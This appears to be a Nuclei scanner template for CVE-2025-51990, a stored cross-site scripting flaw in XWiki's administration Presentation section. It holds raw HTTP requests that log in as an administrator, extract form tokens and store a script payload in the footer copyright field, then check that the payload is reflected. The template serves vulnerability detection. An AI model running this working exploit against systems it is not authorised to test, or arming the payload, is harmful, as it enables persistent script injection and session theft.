id: CVE-2025-51990

info:
  name: XWiki – Stored Cross-Site Scripting (XSS)
  author: 0x_Akoko
  severity: medium
  description: |
    XWiki through version 17.3.0 contains stored cross-site scripting caused by improper sanitization of inputs in the Administration interface's Presentation section, letting authenticated administrators inject JavaScript that executes in visitors' browsers, exploit requires administrator authentication.
  impact: |
    Attackers can execute persistent scripts in users' browsers, leading to session hijacking, credential theft, and unauthorized actions without user interaction.
  remediation: |
    Update to a version later than 17.3.0 or the latest available version.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-51990
    - https://github.com/malcxlmj/cve-writeups/blob/main/CVE-2025-51990.md
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cwe-id: CWE-79
  metadata:
    max-request: 4
    verified: true
  tags: xwiki,xss,stored-xss,authenticated

flow: http(1) && http(2) && http(3) && http(4)

http:
  - raw:
      - |
        GET /bin/login/XWiki/XWikiLogin HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: login_token
        internal: true
        regex:
          - 'name="form_token" value="([^"]+)"'
        group: 1

  - raw:
      - |
        POST /bin/loginsubmit/XWiki/XWikiLogin HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        xredirect=&form_token={{login_token}}&j_username={{username}}&j_password={{password}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 302
          - contains(location, '/bin/view/Main/')
        condition: and
        internal: true

  - raw:
      - |
        GET /bin/admin/XWiki/XWikiPreferences?editor=globaladmin&section=Presentation HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: form_token
        internal: true
        regex:
          - 'data-xwiki-form-token="([^"]+)"'
        group: 1

  - raw:
      - |
        POST /bin/saveandcontinue/XWiki/XWikiPreferences HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        XWiki.XWikiPreferences_0_showannotations=&XWiki.XWikiPreferences_0_showcomments=&XWiki.XWikiPreferences_0_showattachments=&XWiki.XWikiPreferences_0_showhistory=&XWiki.XWikiPreferences_0_showinformation=&XWiki.XWikiPreferences_0_title=&XWiki.XWikiPreferences_0_meta=&XWiki.XWikiPreferences_0_webcopyright=%3CScRiPt%3Ealert%28%27{{randstr}}%27%29%3B%3C%2FScRiPt%3E&XWiki.XWikiPreferences_0_version=&form_token={{form_token}}&xcontinue=%2Fbin%2Fadmin%2FXWiki%2FXWikiPreferences%3Feditor%3Dglobaladmin%26section%3DPresentation&xredirect=%2Fbin%2Fadmin%2FXWiki%2FXWikiPreferences%3Feditor%3Dglobaladmin%26section%3DPresentation&classname=XWiki.XWikiPreferences&formactionsac=Save

      - |
        GET /bin/admin/XWiki/XWikiPreferences HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body, '<ScRiPt>alert(\'{{randstr}}\');</ScRiPt>')
          - contains(body, 'footerglobal')
        condition: and
# digest: 4b0a004830460221009e419baee72db81aa452b81a9342c52c18abfd2c4af13b76ffbdfdc49f2f3fb5022100e81c6643d39662e840cf7f81dc89ccb93bbaea762e9bd2112e826d09245514fb:922c64590222798bb761d5b6d8e72950